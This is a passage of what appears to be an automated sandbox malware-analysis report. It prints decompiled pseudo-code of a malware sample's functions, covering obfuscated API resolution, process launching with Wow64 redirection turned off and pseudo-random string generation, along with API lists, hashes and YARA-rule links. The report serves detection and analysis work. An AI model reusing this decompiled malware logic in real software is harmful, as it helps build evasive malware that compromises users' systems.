                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                        • wcstombs.NTDLL ref: 012027E1
                                                          • Part of subcall function 0120627E: SysAllocString.OLEAUT32(00000000), ref: 012062BF
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 01202822
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01202832
                                                        • HeapFree.KERNEL32(00000000,00000000,?,05769630), ref: 01202842
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01202852
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01202860
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                        • String ID:
                                                        • API String ID: 972889839-0
                                                        • Opcode ID: 4cffaecbdcbfa861bdefb007c770570f94aa585f246857902864fe254a9095e7
                                                        • Instruction ID: 41831e18cf05076b59b8643d686f9b4117bda988c42d2ffbfe4e9cc1c07eb163
                                                        • Opcode Fuzzy Hash: 4cffaecbdcbfa861bdefb007c770570f94aa585f246857902864fe254a9095e7
                                                        • Instruction Fuzzy Hash: 87A16F71500219EFDB23DF68EC8CEAA3BA9FF48354B144225F909C7262D735D954CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206414, Relevance: 16.6, APIs: 11, Instructions: 112stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 43%
                                                        			E01206414(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x120a38c; // 0x5769bd8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E01202292(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x12091ac;
				}
				_t46 = E012016F4(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E01205FBC(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x120a2d4; // 0x455d5a8
						_t16 = _t75 + 0x120bab8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E01202292(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x12091b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E01205FBC(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E012013CC(_v20);
						} else {
							_t66 =  *0x120a2d4; // 0x455d5a8
							_t31 = _t66 + 0x120bbd8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E012013CC(_v12);
				}
				return _v24;
			}




























                                                        0x0120641c
                                                        0x01206422
                                                        0x01206429
                                                        0x0120642f
                                                        0x01206433
                                                        0x01206437
                                                        0x0120643a
                                                        0x01206441
                                                        0x01206444
                                                        0x01206446
                                                        0x01206446
                                                        0x0120644f
                                                        0x01206456
                                                        0x01206459
                                                        0x0120645f
                                                        0x01206469
                                                        0x01206472
                                                        0x01206479
                                                        0x01206492
                                                        0x01206499
                                                        0x0120649c
                                                        0x012064a5
                                                        0x012064ae
                                                        0x012064bf
                                                        0x012064c8
                                                        0x012064cc
                                                        0x012064d0
                                                        0x012064d7
                                                        0x012064da
                                                        0x012064dc
                                                        0x012064dc
                                                        0x012064e6
                                                        0x012064ef
                                                        0x012064f6
                                                        0x0120650e
                                                        0x01206512
                                                        0x0120654f
                                                        0x01206514
                                                        0x01206517
                                                        0x0120651f
                                                        0x01206530
                                                        0x0120653c
                                                        0x01206544
                                                        0x01206548
                                                        0x01206548
                                                        0x01206512
                                                        0x01206557
                                                        0x0120655c
                                                        0x01206563

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 01206429
                                                        • lstrlen.KERNEL32(?,80000002,00000005), ref: 01206469
                                                        • lstrlen.KERNEL32(00000000), ref: 01206472
                                                        • lstrlen.KERNEL32(00000000), ref: 01206479
                                                        • lstrlenW.KERNEL32(80000002), ref: 01206486
                                                        • wsprintfW.USER32 ref: 012064BF
                                                        • lstrlen.KERNEL32(?,00000004), ref: 012064E6
                                                        • lstrlen.KERNEL32(?), ref: 012064EF
                                                        • lstrlen.KERNEL32(?), ref: 012064F6
                                                        • lstrlenW.KERNEL32(?), ref: 012064FD
                                                        • wsprintfW.USER32 ref: 01206530
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                                        • String ID:
                                                        • API String ID: 822878831-0
                                                        • Opcode ID: 178db966b594e25ed6d10dd4869f5e1284234bfada10190b8894d6ab06d6b61c
                                                        • Instruction ID: 6fad7d22a415b969573ebaad066bef4c1a7ec49956a2e32571192034797b6075
                                                        • Opcode Fuzzy Hash: 178db966b594e25ed6d10dd4869f5e1284234bfada10190b8894d6ab06d6b61c
                                                        • Instruction Fuzzy Hash: 3A415E7690021AFFCF22AFA4DC0899EBFB5EF44308F050255EE04A7253D7369A64DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01202F12, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 61%
                                                        			E01202F12(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E01206ACC(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E012077FF( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x120a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x120a2d4; // 0x455d5a8
					_t18 = _t50 + 0x120b55b; // 0x73797325
					_t52 = E01204B6B(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x120a2d4; // 0x455d5a8
						_t20 = _t53 + 0x120b73d; // 0x5768ce5
						_t21 = _t53 + 0x120b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x120a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E012013CC(_t76);
				goto L12;
			}



















                                                        0x01202f1b
                                                        0x01202f1b
                                                        0x01202f29
                                                        0x01202f32
                                                        0x01202f35
                                                        0x01203047
                                                        0x0120304e
                                                        0x0120304e
                                                        0x01202f44
                                                        0x01202f4c
                                                        0x01202f51
                                                        0x01202f54
                                                        0x01202f69
                                                        0x01202f6f
                                                        0x01202f70
                                                        0x01202f73
                                                        0x01202f79
                                                        0x01202f7c
                                                        0x01202f81
                                                        0x01202f89
                                                        0x01202f90
                                                        0x01202f97
                                                        0x01202f9a
                                                        0x0120302e
                                                        0x01202fa0
                                                        0x01202fa0
                                                        0x01202fa5
                                                        0x01202fac
                                                        0x01202fc0
                                                        0x01202fc4
                                                        0x01203015
                                                        0x01202fc6
                                                        0x01202fc6
                                                        0x01202fcd
                                                        0x01202fd4
                                                        0x01202fec
                                                        0x01202ff2
                                                        0x01202ff6
                                                        0x01203010
                                                        0x01202ff8
                                                        0x01203001
                                                        0x01203006
                                                        0x01203006
                                                        0x01202ff6
                                                        0x01203026
                                                        0x01203026
                                                        0x01202f9a
                                                        0x01203035
                                                        0x0120303e
                                                        0x01203042
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 01206ACC: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01202F2E,?,?,?,?,00000000,00000000), ref: 01206AF1
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,7243775A), ref: 01206B13
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,614D775A), ref: 01206B29
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01206B3F
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01206B55
                                                          • Part of subcall function 01206ACC: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01206B6B
                                                        • memset.NTDLL ref: 01202F7C
                                                          • Part of subcall function 01204B6B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,01202F95,73797325), ref: 01204B7C
                                                          • Part of subcall function 01204B6B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 01204B96
                                                        • GetModuleHandleA.KERNEL32(4E52454B,05768CE5,73797325), ref: 01202FB3
                                                        • GetProcAddress.KERNEL32(00000000), ref: 01202FBA
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 01202FD4
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 01202FF2
                                                        • CloseHandle.KERNEL32(00000000), ref: 01203001
                                                        • CloseHandle.KERNEL32(?), ref: 01203006
                                                        • GetLastError.KERNEL32 ref: 0120300A
                                                        • HeapFree.KERNEL32(00000000,?), ref: 01203026
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                        • String ID:
                                                        • API String ID: 91923200-0
                                                        • Opcode ID: f642edd8e8da7a54cb2e404afe1ec63072d30e4f52147558062d498999f2f3f7
                                                        • Instruction ID: 3edc119e2aba69014fe7ede2f6b58fe347264c75579ac6b36675d9f4086c510a
                                                        • Opcode Fuzzy Hash: f642edd8e8da7a54cb2e404afe1ec63072d30e4f52147558062d498999f2f3f7
                                                        • Instruction Fuzzy Hash: 7B315E71911219AFDF22EFA4DC489DEBFBAFF04340F104261E605A3156D7759644CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206ACC, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01206ACC(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01205FBC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x120a2d4; // 0x455d5a8
					_t1 = _t23 + 0x120b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x120a2d4; // 0x455d5a8
					_t2 = _t26 + 0x120b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E012013CC(_t54);
					} else {
						_t30 =  *0x120a2d4; // 0x455d5a8
						_t5 = _t30 + 0x120b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x120a2d4; // 0x455d5a8
							_t7 = _t33 + 0x120b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x120a2d4; // 0x455d5a8
								_t9 = _t36 + 0x120b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x120a2d4; // 0x455d5a8
									_t11 = _t39 + 0x120b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E01206EB3(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                        0x01206adb
                                                        0x01206adf
                                                        0x01206ba1
                                                        0x01206ae5
                                                        0x01206ae5
                                                        0x01206aea
                                                        0x01206afd
                                                        0x01206aff
                                                        0x01206b04
                                                        0x01206b0c
                                                        0x01206b13
                                                        0x01206b17
                                                        0x01206b1a
                                                        0x01206b99
                                                        0x01206b9a
                                                        0x01206b1c
                                                        0x01206b1c
                                                        0x01206b21
                                                        0x01206b29
                                                        0x01206b2d
                                                        0x01206b30
                                                        0x00000000
                                                        0x01206b32
                                                        0x01206b32
                                                        0x01206b37
                                                        0x01206b3f
                                                        0x01206b43
                                                        0x01206b46
                                                        0x00000000
                                                        0x01206b48
                                                        0x01206b48
                                                        0x01206b4d
                                                        0x01206b55
                                                        0x01206b59
                                                        0x01206b5c
                                                        0x00000000
                                                        0x01206b5e
                                                        0x01206b5e
                                                        0x01206b63
                                                        0x01206b6b
                                                        0x01206b6f
                                                        0x01206b72
                                                        0x00000000
                                                        0x01206b74
                                                        0x01206b7a
                                                        0x01206b7f
                                                        0x01206b86
                                                        0x01206b8d
                                                        0x01206b90
                                                        0x00000000
                                                        0x01206b92
                                                        0x01206b95
                                                        0x01206b95
                                                        0x01206b90
                                                        0x01206b72
                                                        0x01206b5c
                                                        0x01206b46
                                                        0x01206b30
                                                        0x01206b1a
                                                        0x01206baf

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,01202F2E,?,?,?,?,00000000,00000000), ref: 01206AF1
                                                        • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01206B13
                                                        • GetProcAddress.KERNEL32(00000000,614D775A), ref: 01206B29
                                                        • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01206B3F
                                                        • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01206B55
                                                        • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01206B6B
                                                          • Part of subcall function 01206EB3: memset.NTDLL ref: 01206F32
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AddressProc$AllocateHandleHeapModulememset
                                                        • String ID:
                                                        • API String ID: 1886625739-0
                                                        • Opcode ID: 8930fe5ea09eb97c94b1ccbeafaffd666ec4fe601713dca23db7517ad5827d3d
                                                        • Instruction ID: 6cddcaa19d3b30d1093292f0e33638e517e519d5b61c6eceb9b1855db5483c22
                                                        • Opcode Fuzzy Hash: 8930fe5ea09eb97c94b1ccbeafaffd666ec4fe601713dca23db7517ad5827d3d
                                                        • Instruction Fuzzy Hash: 61212DF1610707EFDB62EF69DC48E5A7BECEB04340B04462AE609D7243E735E9048B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01202D0E, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E01202D0E(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E01205FBC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E012013CC(_v16);
								goto L37;
							}
							_t103 = E01205FBC((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x120a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                        0x01202d15
                                                        0x01202d1c
                                                        0x01202d21
                                                        0x01202d24
                                                        0x01202d2b
                                                        0x01202d2e
                                                        0x01202d31
                                                        0x01202d38
                                                        0x01202d3b
                                                        0x01202e8f
                                                        0x01202e91
                                                        0x01202e93
                                                        0x01202e98
                                                        0x01202e98
                                                        0x01202d41
                                                        0x01202d44
                                                        0x01202d47
                                                        0x01202d49
                                                        0x01202d49
                                                        0x01202d4d
                                                        0x00000000
                                                        0x00000000
                                                        0x01202d51
                                                        0x01202d7d
                                                        0x01202d82
                                                        0x01202d84
                                                        0x01202d84
                                                        0x01202d87
                                                        0x01202d8a
                                                        0x01202d8a
                                                        0x01202d8c
                                                        0x00000000
                                                        0x01202d57
                                                        0x01202d59
                                                        0x01202d78
                                                        0x01202d78
                                                        0x01202d8f
                                                        0x01202d8f
                                                        0x01202d90
                                                        0x01202d90
                                                        0x01202d93
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01202d93
                                                        0x01202d5d
                                                        0x01202da4
                                                        0x01202da8
                                                        0x01202e82
                                                        0x01202e84
                                                        0x01202e84
                                                        0x01202e85
                                                        0x01202e88
                                                        0x00000000
                                                        0x01202e88
                                                        0x01202dc2
                                                        0x01202dc6
                                                        0x01202e7e
                                                        0x00000000
                                                        0x01202e7e
                                                        0x01202dcc
                                                        0x01202dcf
                                                        0x01202dd3
                                                        0x01202dd9
                                                        0x01202ddc
                                                        0x01202e74
                                                        0x01202e74
                                                        0x00000000
                                                        0x01202e7a
                                                        0x01202de7
                                                        0x01202df0
                                                        0x01202e04
                                                        0x01202e0b
                                                        0x01202e20
                                                        0x01202e26
                                                        0x01202e2e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01202e30
                                                        0x01202e30
                                                        0x01202e30
                                                        0x01202e37
                                                        0x01202e3f
                                                        0x00000000
                                                        0x00000000
                                                        0x01202e41
                                                        0x01202e4a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01202e4c
                                                        0x01202e4e
                                                        0x01202e51
                                                        0x01202e51
                                                        0x01202e54
                                                        0x01202e58
                                                        0x01202e5b
                                                        0x01202e61
                                                        0x01202e64
                                                        0x01202e6b
                                                        0x00000000
                                                        0x01202de7
                                                        0x01202d62
                                                        0x01202d6d
                                                        0x01202d70
                                                        0x01202d72
                                                        0x01202d72
                                                        0x01202d75
                                                        0x01202d77
                                                        0x00000000
                                                        0x01202d77
                                                        0x01202d51
                                                        0x01202d97
                                                        0x01202d9c
                                                        0x01202d9e
                                                        0x01202d9e
                                                        0x01202da1
                                                        0x01202da1
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01202E0B
                                                        • lstrcat.KERNEL32(69B25F45,00000020), ref: 01202E20
                                                        • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01202E37
                                                        • lstrlen.KERNEL32(69B25F45), ref: 01202E5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 3214092121-3916222277
                                                        • Opcode ID: 33497d8ac73aab4cd9fca001623a0d148e4d46ab938ec42c0a64d59c618a481e
                                                        • Instruction ID: 88adbf33c181679c3a6eac200e2a458174714fc4b6f7cff3325811f1ef8ffdd2
                                                        • Opcode Fuzzy Hash: 33497d8ac73aab4cd9fca001623a0d148e4d46ab938ec42c0a64d59c618a481e
                                                        • Instruction Fuzzy Hash: 5451A53191011AEFDF26CF59C4886ADBBB5FF55314F148257EA199B287C770AE41CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01201DFA, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01201DFA(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x120a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x120a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x120a2b0 = _t6;
				 *0x120a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x120a2ac = _t7;
				if(_t7 == 0) {
					 *0x120a2ac =  *0x120a2ac | 0xffffffff;
				}
				return 0;
			}








                                                        0x01201e02
                                                        0x01201e0a
                                                        0x01201e0f
                                                        0x00000000
                                                        0x01201e5c
                                                        0x01201e11
                                                        0x01201e19
                                                        0x01201e59
                                                        0x00000000
                                                        0x01201e59
                                                        0x01201e1b
                                                        0x01201e20
                                                        0x01201e32
                                                        0x01201e37
                                                        0x01201e3d
                                                        0x01201e45
                                                        0x01201e4a
                                                        0x01201e4c
                                                        0x01201e4c
                                                        0x00000000

                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0120686A,?,?,00000001), ref: 01201E02
                                                        • GetVersion.KERNEL32(?,00000001), ref: 01201E11
                                                        • GetCurrentProcessId.KERNEL32(?,00000001), ref: 01201E20
                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 01201E3D
                                                        • GetLastError.KERNEL32(?,00000001), ref: 01201E5C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                        • String ID:
                                                        • API String ID: 2270775618-0
                                                        • Opcode ID: fe99a22a8f167f975678be1792c5f8164beb1b3b951b12ed48ad8affb3991c07
                                                        • Instruction ID: b9d93ffb06d381d461eaa9abc0d6b9ec89a09b7ac17964dda7a5f7054fec59d0
